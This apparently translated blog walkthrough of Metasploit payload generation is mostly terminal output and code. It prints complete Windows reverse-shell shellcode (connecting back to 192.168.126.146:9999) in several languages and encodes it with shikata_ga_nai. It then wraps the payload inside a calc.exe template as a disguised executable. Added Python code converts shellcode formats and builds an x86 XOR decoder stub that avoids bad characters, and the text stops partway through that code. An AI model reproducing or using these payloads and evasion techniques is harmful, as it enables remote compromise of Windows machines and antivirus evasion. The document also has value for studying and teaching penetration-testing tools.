http://www.offensive-security.com/metasploit-unleashed/Metasploit_Generating_Payloads
root@LUCKYSTRIKE:~# msfpayload -h
Usage: /usr/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
OPTIONS:
-h Help banner
-l List available payloads
root@LUCKYSTRIKE:~# msfencode -h
Usage: /usr/metasploit/msf3/msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-d <opt> Specify the directory in which to look for EXE templates
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
-v Increase verbosity
-x <opt> Specify an alternate executable template
root@LUCKYSTRIKE:~# msfencode -l
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
These are the two commands needed to build a payload, plus the list of available encoders.
msfpayload on its own is usually enough, but some special cases also need msfencode, so both are covered here.
What follows are examples of building a payload with the msfpayload command.
The payload I used is windows/shell_reverse_tcp, which I personally like.
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 S
Name: Windows Command Shell, Reverse TCP Inline
Module: payload/windows/shell_reverse_tcp
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 314
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
sf <stephen_fewer@harmonysecurity.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.126.146 yes The listen address
LPORT 9999 yes The listen port
Description:
Connect back to attacker and spawn a command shell
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 C
/*
* windows/shell_reverse_tcp - 314 bytes
* http://www.metasploit.com
* VERBOSE=false, LHOST=192.168.126.146, LPORT=9999,
* ReverseConnectRetries=5, EXITFUNC=process,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 P
# windows/shell_reverse_tcp - 314 bytes
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.126.146, LPORT=9999,
# ReverseConnectRetries=5, EXITFUNC=process,
# InitialAutoRunScript=, AutoRunScript=
my $buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" .
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" .
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" .
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" .
"\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56" .
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" .
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" .
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" .
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" .
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" .
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" .
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" .
"\x6f\x6a\x00\x53\xff\xd5";
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 y
# windows/shell_reverse_tcp - 314 bytes
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.126.146, LPORT=9999,
# ReverseConnectRetries=5, EXITFUNC=process,
# InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" +
"\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56" +
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 R | msfencode -b '\x00'
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
buf =
"\xb8\x9e\x0b\x64\x4f\xdb\xdf\xd9\x74\x24\xf4\x5b\x33\xc9" +
"\xb1\x4f\x83\xc3\x04\x31\x43\x10\x03\x43\x10\x7c\xfe\x98" +
"\xa7\x09\x01\x61\x38\x69\x8b\x84\x09\xbb\xef\xcd\x38\x0b" +
"\x7b\x83\xb0\xe0\x29\x30\x42\x84\xe5\x37\xe3\x22\xd0\x76" +
"\xf4\x83\xdc\xd5\x36\x82\xa0\x27\x6b\x64\x98\xe7\x7e\x65" +
"\xdd\x1a\x70\x37\xb6\x51\x23\xa7\xb3\x24\xf8\xc6\x13\x23" +
"\x40\xb0\x16\xf4\x35\x0a\x18\x25\xe5\x01\x52\xdd\x8d\x4d" +
"\x43\xdc\x42\x8e\xbf\x97\xef\x64\x4b\x26\x26\xb5\xb4\x18" +
"\x06\x19\x8b\x94\x8b\x60\xcb\x13\x74\x17\x27\x60\x09\x2f" +
"\xfc\x1a\xd5\xba\xe1\xbd\x9e\x1c\xc2\x3c\x72\xfa\x81\x33" +
"\x3f\x89\xce\x57\xbe\x5e\x65\x63\x4b\x61\xaa\xe5\x0f\x45" +
"\x6e\xad\xd4\xe4\x37\x0b\xba\x19\x27\xf3\x63\xbf\x23\x16" +
"\x77\xb9\x69\x7f\xb4\xf7\x91\x7f\xd2\x80\xe2\x4d\x7d\x3a" +
"\x6d\xfe\xf6\xe4\x6a\x01\x2d\x50\xe4\xfc\xce\xa0\x2c\x3b" +
"\x9a\xf0\x46\xea\xa3\x9b\x96\x13\x76\x0b\xc7\xbb\x29\xeb" +
"\xb7\x7b\x9a\x83\xdd\x73\xc5\xb3\xdd\x59\x70\xf4\x4a\xa2" +
"\x2b\x84\x18\x4a\x2e\x78\x3a\x84\xa7\x9e\x2e\x8a\xe1\x09" +
"\xc7\x33\xa8\xc1\x76\xbb\x66\x41\x1a\x2e\xed\x91\x55\x53" +
"\xba\xc6\x32\xa5\xb3\x82\xae\x9c\x6d\xb0\x32\x78\x55\x70" +
"\xe9\xb9\x58\x79\x7c\x85\x7e\x69\xb8\x06\x3b\xdd\x14\x51" +
"\x95\x8b\xd2\x0b\x57\x65\x8d\xe0\x31\xe1\x48\xcb\x81\x77" +
"\x55\x06\x74\x97\xe4\xff\xc1\xa8\xc9\x97\xc5\xd1\x37\x08" +
"\x29\x08\xfc\x38\x60\x10\x55\xd1\x2d\xc1\xe7\xbc\xcd\x3c" +
"\x2b\xb9\x4d\xb4\xd4\x3e\x4d\xbd\xd1\x7b\xc9\x2e\xa8\x14" +
"\xbc\x50\x1f\x14\x95"
The R option emits the payload as raw bytes, which is why it is piped into msfencode here rather than printed; msfencode's output format defaults to Ruby (-t ruby), so the encoded result above appears as a Ruby string. Without encoding, the JavaScript (J) output looks like this:
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 J
// windows/shell_reverse_tcp - 314 bytes
// http://www.metasploit.com
// VERBOSE=false, LHOST=192.168.126.146, LPORT=9999,
// ReverseConnectRetries=5, EXITFUNC=process,
// InitialAutoRunScript=, AutoRunScript=
%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u68c7%ua8c0%u927e%u0268%u2700%u890f%u6ae6%u5610%u6857%ua599%u6174%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff
The encoded JavaScript output here comes out roughly four times as long, but that is an artefact of the command rather than of the format: the J option prints text (comment header included), and msfencode encodes whatever arrives on stdin as payload bytes, so it encoded that text rather than the 314-byte payload (hence the reported size of 1183 instead of the 341 seen with R). An encoded JavaScript payload comes from piping the raw bytes instead: msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 R | msfencode -t js_le
There are js_le and js_be types, but I could not see any difference between them.. What sets the two apart is something I still need to look into... -_-;;
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 J | msfencode -t js_le
[*] x86/shikata_ga_nai succeeded with size 1183 (iteration=1)
%u7db8%u9a64%udb2b%ud9c1%u2474%u5ef4%uc929%ub966%u0121%u4631%u8316%u04c6%u4603%u9f12%ub591%u7f04%ua32d%u1b34%u44be%uccba%uc333%u7e59%u4cd8%u1bd0%u1656%u9066%u87f3%u35f2%u178c%u99d6%u695f%uf91c%uf0fd%u9c28%u0972%u71fe%u6555%uf974%u4fe5%u2e5b%uc771%u1ed4%u4210%u3f6f%ufc99%ud0e3%u8934%u4dd5%u1ca8%ube20%uff19%u8562%ubd37%u56c5%u7cfd%u39bc%u0d91%u9525%ube49%uaaed%u6ada%u05d3%ua0e4%u5405%ufd20%ua777%ucb7e%uf6a9%u054a%ud89a%u39fe%u4aad%u84ab%u5308%uce6a%u8346%u1f86%ue3b8%u3ac4%u86b0%ub79a%u0b59%u5634%ueecc%ud2a9%u9542%u6959%u300a%ub0d1%u96f9%u8e35%uaf59%u5661%u610f%u6bc9%u0fdf%uf0a2%u9c7a%udb4f%u68a4%u0c9f%u2585%u3bb1%udcb1%ud02c%u6b78%u47db%ue629%ucb4d%u7aae%u9bfb%u4744%u7bd7%uc2e4%u1353%u59b4%ub8f2%ud35b%u4f63%u2ee8%u8a7e%u3565%ub246%u90e6%u0ac3%ue2d9%u4e12%u226c%ua055%u67be%uf8e0%u5187%udc3a%uae82%u7b0b%uf558%ub51e%u9196%u9cd2%u6ca3%ue721%uab29%u2f30%u80cc%u6a8a%ud665%u4189%u33b7%u9f3b%u0385%ufaa1%u4b9c%u3447%u8e6b%u04f2%ue7ab%u4dce%u65be%ube18%u4c26%u8c13%uba90%ud5ba%ua4a9%u255a%u0d63%u2ad6%u7eb3%u8829%ub3c6%ub32a%u964b%u04d9%ueeef%u4e10%u3c9a%ua030%u6556%ua3c3%u57a7%u011b%ua7bd%u2a3f%ue25b%ucfca%udc94%u3505%u7aae%u5056%ua762%uafe3%u92b5%uf539%ue9cc%ucd0f%u344c%u1505%u07f3%u40d5%u5486%ubf76%ubf5a%udb0d%u8faa%u06dc%udbbe%u712e%u0622%ub93a%u7f97%u9cfc%u48a2%ubdc8%u937c%u7245%uef4c%u57c4%u3adb%ufc37%u6113%uc842%u516b%u15ce%u99f9%u676c%ufc39%ub505%ucb09%u9cdd%u571c%uef2d%ub2ef%u3c24%ud973%u67f5%u1906%u5398%u7cd1%ua429%u4d43%uf1e5%ud5f6%uca33%u30c9%u4c49%u094c%ub580%u0ee5%u86d2%uf534%u8a67%u9407%u69e4%u661d%u128f%ua3bb%ub63a%u9b74%u1df5%ube0e%u6ec5%u65c8%uf753%u521c%ud2ae%uab29%u2cb4%uf6e1%u7e41%u9e67%ua591%u6c12%u92d6%ub5b8%ub863%u8272%u67be%ud406%u52a2%u01d0%uaf56%u7c14%ueaa0%u1a21%uc4e3%uc7f8%u1d76%u3199%u784f%u0928%ub2cd%u54b1%u8664%uae0d%ucde4%ufe18%u3cd9%udb80%u076c%u4724%u52bc%ubfdd%uaca0%u9a29%ua951%ud461%u14a8%u20f7%u6eff%u6dce%ubc8a%u5f04%ue440%uaa11%ud3ca%uf1bb%u297f%ucf05%u744e%u1a00%u4380%u418b%uce97%uef7b%u3431%uda09%u03db%u01c9%u5451%u7c4b%u81f8%u1bfe%uf898%uc632%uce29%u3056%u15e4%u73e2%u603b%u5634%ubc4e%uab74%u9982%ufd01%ud1da%u24d9%u256e%u1129%u6ca7%u6838%u5da1%ub7f0%u9458%u82cc%ufd96%udb59%uc9e1%u06c2%u027b%u7a32%u47b5%u1e49%ue18c%ufbd7%ud49b%u6127%u025c%u553d%u7cac%ub08c%u4eb9%u8ad7%u8a71%udf52%ub745%u3aa8%u01d3%u71e9%u4b2b%u417c%ua17b%u9447%uf50e%ue087%ud092%u6892%u7d66%u553b%ub4fd%ua0f3%u93cd%uff86%ue91d%uda58%u2428%u10a9%u63e3%u6dbc%u5833%ua80e%uc546%u840f%u2090%u8ca5%u1a86%u6923%u3d32%u14cd%ue48c%uee64%u82d5%u2bb3%u7d53%u5084%ua4ac%uf781%uc5ea%ud259%u337f%u2ba8%u66e5%u63b9%u5ed7%ua679%uad62%u984e%uf4bc%ue0c5%uc685%u3543%u1083%u50ed%u785d%uaf98%ub397%uea52%u85a2%uc1aa%ucf7b%u48bf%u36b1%uaf79%u7ecc%u9848%u5a1a%u82df%uc257%u6f79%u3ced%u59b5%u6435%u93cc%u5071%ufe4a%ua40c%u30ab%uf1df%u05be%u9f28%u4073%u6a23%ubf43%ub1fc%ud9de%u8934%u0011%udc4c%u7c63%u3bcf%ub5f1%u7139%u90c0%u1f30%ubf56%ufa88%u5ce3%u32da%u873a%u0951%uf376%u48ad%ucb03%ua1fc%u0e88%ufd8a%u602a%udb45%ub2c7%u1791%u971c%u34ac%ue66a%u9e7e%u3ce7%ud04b%u1937%u25c6%u5408%u631c%ua31d%u5e6a%ueeeb%u94e7%uc525%uf031%u113c%ucf5b%u7c88%u1ad6%u4bc3%u402e%u865e%ubf78%ucd93%u88f1%u3bea%ud3c2%u7079%u7f54%u53e1%u19ed%ua383%uc33b%ueb3e%u6f7a%u2ef4%u5b08%u5593%u86c2%ua12e%ufc14%uece6%ucd2d%u8836%u14ab%u6442%u610c%ua194%ubc19%u9180%u9bd6%u873d%ud27e%u628d%u780a%u088c%u59c1%ub225%uc41c%u17f5%u3d2a%u36c0%u18e6%ud959%u5530%u3c99%ufb48%u07bd%ude87%u1148%u1981%uf8d7%u6938%u6674%ua8f6%u510f%u829b%ub8d9%udb2e%uf215%u3eb1%u9723%u2701%u72a9%u9717%u4b18%uf2e2%u8717%u9f3b%uc2b5%u6836%u3d08%ub38a%u0b19%u8d8d%u5687%uc738%ua874%u02f2%uac0e%u2ac7%u4196
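Added example (not from the page and not Metasploit's code): a small Python module that reproduces the text formats shown above from a raw payload buffer, so that the differences between them are visible in code rather than only in dumps. It wraps C output at 15 bytes per line and Perl/Ruby at 14, as the outputs above do, and implements the %u form in both byte orders: js_le, which is what the J option prints, packs each pair of bytes as a 16-bit little-endian word, so fc e8 89 00 becomes %ue8fc%u0089, while js_be keeps the bytes in order (%ufce8%u8900). An odd-length buffer gets one 0x41 pad byte (an x86 inc ecx) before packing, the same padding Rex::Text.to_unescape applies. The sample buffer is constructed from the first 16 bytes of the payload printed above; the parsers at the end take the text back to bytes, which is handy when all you have is a C string or a %u blob from someone else's exploit.

```python
"""Re-create msfpayload's C / Perl / Ruby / JavaScript (%u) text formats.

Added example, not Metasploit's code. Layout follows the outputs on the page:
C wraps 15 bytes per line, Perl and Ruby 14, and the %u form packs 16-bit
words little-endian for js_le (what the J option prints) or big-endian for js_be.
"""
import re

# Constructed sample: the first 16 bytes of windows/shell_reverse_tcp as printed above.
SAMPLE = bytes.fromhex("fce8890000006089e531d2648b52308b")


def _escaped_lines(buf: bytes, width: int) -> list[str]:
    """Split buf into quoted "\\xNN..." chunks of `width` bytes each."""
    return ['"' + "".join(f"\\x{b:02x}" for b in buf[i:i + width]) + '"'
            for i in range(0, len(buf), width)]


def to_c(buf: bytes, name: str = "buf") -> str:
    """C form: adjacent string literals, 15 bytes per line, terminated with ';'."""
    return f"unsigned char {name}[] =\n" + "\n".join(_escaped_lines(buf, 15)) + ";"


def to_perl(buf: bytes, name: str = "buf") -> str:
    """Perl form: 14 bytes per line joined with the '.' concatenation operator."""
    return f"my ${name} =\n" + " .\n".join(_escaped_lines(buf, 14)) + ";"


def to_ruby(buf: bytes, name: str = "buf") -> str:
    """Ruby form: 14 bytes per line joined with '+'."""
    return f"{name} =\n" + " +\n".join(_escaped_lines(buf, 14))


def to_unescape(buf: bytes, endian: str = "le", pad: int = 0x41) -> str:
    """%uXXXX form (js_le / js_be). Odd lengths get one pad byte first (0x41 = inc ecx)."""
    data = bytes(buf) + (bytes([pad]) if len(buf) % 2 else b"")
    words = []
    for i in range(0, len(data), 2):
        b0, b1 = data[i], data[i + 1]
        # little-endian: the second byte becomes the high half of the 16-bit word
        words.append(f"%u{b1:02x}{b0:02x}" if endian == "le" else f"%u{b0:02x}{b1:02x}")
    return "".join(words)


def from_unescape(text: str, endian: str = "le") -> bytes:
    """Inverse of to_unescape: turn %uXXXX runs back into bytes (pad byte included)."""
    out = bytearray()
    for word in re.findall(r"%u([0-9a-fA-F]{4})", text):
        hi, lo = int(word[:2], 16), int(word[2:], 16)
        out += bytes([lo, hi]) if endian == "le" else bytes([hi, lo])
    return bytes(out)


def from_escaped(text: str) -> bytes:
    """Pull the bytes back out of a C/Perl/Ruby "\\xNN" string; quotes, '+' and '.' are ignored."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


if __name__ == "__main__":
    for fmt in (to_c, to_perl, to_ruby):
        print(fmt(SAMPLE), "\n")
    print("js_le:", to_unescape(SAMPLE, "le"))
    print("js_be:", to_unescape(SAMPLE, "be"))
```

Run it and compare the first lines against the C, Perl and Ruby dumps above; the js_le string should match the beginning of the J output word for word, and the js_be string differs only in the byte order inside each %u word.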
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 X | msfencode -o reverse_shell
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"}
[*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1)
I tried specifying the type as exe to drop it to a file, but it did not work.. it just kept printing a message saying it was too small.
Without encoding it does come out in PE format, but... there seems to be some other way.
(I will post this first and keep fiddling with it...)
The problem above was solved with the method below. Hehe
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 X | msfencode -t exe -x calc.exe -k -o reverse_shell.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
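Added example (not Metasploit's code): the mechanics behind msfencode's -b and -c options, reduced to about sixty lines of Python. The real x86/shikata_ga_nai is polymorphic and uses a 4-byte additive-feedback key; this version uses a hand-assembled single-byte XOR decoder for 32-bit x86 (an assumption that fits the x86 payload above) and is meant to be read and checked offline rather than to replace the tool. It shows the three things the transcript above reveals: the key is chosen so that neither the decoder stub nor the encoded body contains a bad character (the -b '\x00' run), each iteration wraps the previous output in another stub so the size grows by a constant per pass (27 bytes for shikata_ga_nai, 24 here), and when no key can satisfy the constraint the encoder fails outright. That last path is what the WAR run further down shows ("Encoding failed due to a bad character"): an already-built WAR archive was piped into msfencode in place of the raw payload, shikata_ga_nai could not keep 0x00 out of its output, and msfencode fell back to php/base64. The test payload is constructed and deliberately contains 0x00 bytes.

```python
"""What `msfencode -b '\\x00' -c N` does, stripped to the essentials.

Added example, not Metasploit code. Instead of shikata_ga_nai (polymorphic,
4-byte additive-feedback key) this uses a hand-assembled single-byte XOR
decoder for 32-bit x86 (assumption: the payload is x86, as above). The key is
chosen so that neither the stub nor the encoded body contains a bad character,
and each extra iteration wraps the previous result in another stub.
"""
import struct

STUB_LEN = 24  # size of one decoder stub; each iteration adds this much


def build_decoder(key: int, length: int) -> bytes:
    """Hand-assembled x86-32 stub; decodes the `length` bytes that follow it, in place.

        00: eb 11                 jmp short get_addr
        02: 5e          decoder:  pop esi              ; esi -> encoded body (pushed by the call)
        03: b9 <~length>          mov ecx, ~length     ; complement keeps 00 out of small lengths
        08: f7 d1                 not ecx              ; ecx = length
        0a: 80 74 0e ff <key> decode: xor byte [esi+ecx-1], key   ; from the last byte down
        0f: e2 f9                 loop decode
        11: eb 05                 jmp short body
        13: e8 ea ff ff ff get_addr: call decoder      ; pushes the address of `body`
        18:             body:
    The body is rewritten at run time, so the stub needs writable+executable memory.
    """
    if not 1 <= length <= 0xFFFFFFFF:
        raise ValueError("length must be non-zero (loop would wrap) and fit in ecx")
    return (b"\xeb\x11\x5e\xb9" + struct.pack("<I", ~length & 0xFFFFFFFF)
            + b"\xf7\xd1\x80\x74\x0e\xff" + bytes([key])
            + b"\xe2\xf9\xeb\x05\xe8\xea\xff\xff\xff")


def encode_once(payload: bytes, bad) -> tuple[int, bytes]:
    """Try every key; return (key, stub + body) for the first one whose output avoids `bad`."""
    bad = frozenset(bad)
    for key in range(1, 256):
        stub = build_decoder(key, len(payload))
        body = bytes(b ^ key for b in payload)
        if not (bad & set(stub)) and not (bad & set(body)):
            return key, stub + body
    raise ValueError("Encoding failed: no single-byte key avoids the bad characters")


def encode(payload: bytes, bad=frozenset({0x00}), iterations: int = 1) -> bytes:
    """Mirror of `msfencode -b <bad> -c <iterations>`: each pass wraps the previous output."""
    out = payload
    for i in range(1, iterations + 1):
        key, out = encode_once(out, bad)
        print(f"[*] xor stub succeeded with size {len(out)} (iteration={i}, key=0x{key:02x})")
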